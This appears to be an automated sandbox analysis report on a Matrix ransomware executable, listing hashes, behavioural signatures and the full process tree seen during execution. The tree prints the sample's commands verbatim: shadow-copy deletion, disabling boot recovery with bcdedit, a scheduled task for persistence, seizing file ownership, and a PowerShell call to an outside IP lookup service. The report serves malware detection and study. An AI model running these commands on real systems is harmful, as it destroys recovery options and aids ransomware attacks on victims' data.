Overview

overview

10

Static

static

fdf5c75097...07.exe

windows7_x64

10

fdf5c75097...07.exe

windows10-2004_x64

10

Analysis

  • max time kernel
    4294211s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20220223-en
  • submitted
    06-03-2022 05:30

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe

  • Size

    2.6MB

  • MD5

    99f0feb589d41c1465846e380d5cdc7d

  • SHA1

    bae92119e9d856e735ed605d2db42680c2dabfc7

  • SHA256

    fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107

  • SHA512

    d8a35f82f4e9d506db76da2ae6ce64b5cc19e28bf74353a07c750ce07547d43ac626d186f5a2f5572ac71d86f2d37868f5837f4b369b8c514c7497b771d8cfef

Score
10/10
matrixdiscoveryevasionpersistenceransomwareupx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://myexternalip.com/raw

Signatures

  • Matrix Ransomware 64 IoCs

    Targeted ransomware with information collection and encryption functionality.

    ransomwarematrix
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
    ransomwareevasion
  • Blocklisted process makes network request 1 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Modifies extensions of user files 1 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Sets service image path in registry 2 TTPs
    persistence
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Loads dropped DLL 4 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
    discovery
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 47 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe
    "C:\Users\Admin\AppData\Local\Temp\fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe"
    1⤵
    • Matrix Ransomware
    • Modifies extensions of user files
    • Loads dropped DLL
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:960
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe" "C:\Users\Admin\AppData\Local\Temp\NWHoFMNm.exe"
      2⤵
        PID:788
      • C:\Users\Admin\AppData\Local\Temp\NWHoFMNm.exe
        "C:\Users\Admin\AppData\Local\Temp\NWHoFMNm.exe" -n
        2⤵
        • Executes dropped EXE
        PID:668
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\YvHy7jXm.txt"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1016
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1216
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\7fE2wvr6.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2020
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\7fE2wvr6.bmp" /f
          3⤵
          • Sets desktop wallpaper using registry
          PID:2040
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
          3⤵
            PID:1076
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
            3⤵
              PID:1628
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\cdyGVeX2.vbs"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:2028
            • C:\Windows\SysWOW64\wscript.exe
              wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\cdyGVeX2.vbs"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2036
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\rTpEcWQ0.bat" /sc minute /mo 5 /RL HIGHEST /F
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:1676
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\rTpEcWQ0.bat" /sc minute /mo 5 /RL HIGHEST /F
                  5⤵
                  • Creates scheduled task(s)
                  PID:1328
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
                4⤵
                  PID:1000
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /Run /I /tn DSHCA
                    5⤵
                      PID:1796
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c ""C:\Users\Admin\AppData\Local\Temp\K16MKzo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf""
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:1768
                • C:\Windows\SysWOW64\attrib.exe
                  attrib -R -A -S "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"
                  3⤵
                  • Views/modifies file attributes
                  PID:1480
                • C:\Windows\SysWOW64\cacls.exe
                  cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf" /E /G Admin:F /C
                  3⤵
                    PID:1824
                  • C:\Windows\SysWOW64\takeown.exe
                    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"
                    3⤵
                    • Modifies file permissions
                    PID:1900
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c c05GxIuC.exe -accepteula "AdobeID.pdf" -nobanner
                    3⤵
                    • Loads dropped DLL
                    PID:1020
                    • C:\Users\Admin\AppData\Local\Temp\c05GxIuC.exe
                      c05GxIuC.exe -accepteula "AdobeID.pdf" -nobanner
                      4⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      PID:864
                      • C:\Users\Admin\AppData\Local\Temp\c05GxIuC64.exe
                        c05GxIuC.exe -accepteula "AdobeID.pdf" -nobanner
                        5⤵
                        • Drops file in Drivers directory
                        • Executes dropped EXE
                        • Enumerates connected drives
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious behavior: LoadsDriver
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1876
              • C:\Windows\system32\taskeng.exe
                taskeng.exe {1A905D5C-FA64-4CD8-975E-A396E59A7343} S-1-5-21-1405931862-909307831-4085185274-1000:GZAATBZA\Admin:Interactive:[1]
                1⤵
                  PID:1672
                  • C:\Windows\SYSTEM32\cmd.exe
                    C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\rTpEcWQ0.bat"
                    2⤵
                      PID:668
                      • C:\Windows\system32\vssadmin.exe
                        vssadmin Delete Shadows /All /Quiet
                        3⤵
                        • Interacts with shadow copies
                        PID:2008
                      • C:\Windows\System32\Wbem\WMIC.exe
                        wmic SHADOWCOPY DELETE
                        3⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1072
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Exec Unrestricted try {start-process -FilePath "vssadmin" -ArgumentList "delete","shadows","/all","/quiet" -WindowStyle Hidden} catch {}
                        3⤵
                        • Drops file in System32 directory
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1828
                        • C:\Windows\system32\vssadmin.exe
                          "C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet
                          4⤵
                          • Interacts with shadow copies
                          PID:1292
                      • C:\Windows\system32\bcdedit.exe
                        bcdedit /set {default} recoveryenabled No
                        3⤵
                        • Modifies boot configuration data using bcdedit
                        PID:1704
                      • C:\Windows\system32\bcdedit.exe
                        bcdedit /set {default} bootstatuspolicy ignoreallfailures
                        3⤵
                        • Modifies boot configuration data using bcdedit
                        PID:336
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Delete /TN DSHCA /F
                        3⤵
                          PID:1824
                    • C:\Windows\system32\vssvc.exe
                      C:\Windows\system32\vssvc.exe
                      1⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:760

                    Network

                    MITRE ATT&CK Enterprise v6

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • memory/960-54-0x0000000075131000-0x0000000075133000-memory.dmp

                      Filesize

                      8KB

                      Download

                    • memory/1216-61-0x0000000073BE0000-0x000000007418B000-memory.dmp

                      Filesize

                      5.7MB

                      Download

                    • memory/1216-65-0x00000000025A0000-0x00000000031EA000-memory.dmp

                      Filesize

                      12.3MB

                      Download

                    • memory/1216-62-0x00000000025A0000-0x00000000031EA000-memory.dmp

                      Filesize

                      12.3MB

                      Download

                    • memory/1216-63-0x0000000073BE0000-0x000000007418B000-memory.dmp

                      Filesize

                      5.7MB

                      Download

                    • memory/1216-64-0x00000000025A0000-0x00000000031EA000-memory.dmp

                      Filesize

                      12.3MB

                      Download

                    • memory/1828-77-0x000007FEFBD31000-0x000007FEFBD33000-memory.dmp

                      Filesize

                      8KB

                      Download

                    • memory/1828-78-0x000007FEF2540000-0x000007FEF309D000-memory.dmp

                      Filesize

                      11.4MB

                      Download

                    • memory/1828-80-0x000007FEF49B0000-0x000007FEF534D000-memory.dmp

                      Filesize

                      9.6MB

                      Download

                    • memory/1828-81-0x0000000002590000-0x0000000002592000-memory.dmp

                      Filesize

                      8KB

                      Download

                    • memory/1828-82-0x0000000002592000-0x0000000002594000-memory.dmp

                      Filesize

                      8KB

                      Download

                    • memory/1828-83-0x0000000002594000-0x0000000002597000-memory.dmp

                      Filesize

                      12KB

                      Download

                    • memory/1828-79-0x000000001B710000-0x000000001BA0F000-memory.dmp

                      Filesize

                      3.0MB

                      Download

                    • memory/1828-84-0x000000000259B000-0x00000000025BA000-memory.dmp

                      Filesize

                      124KB

                      Download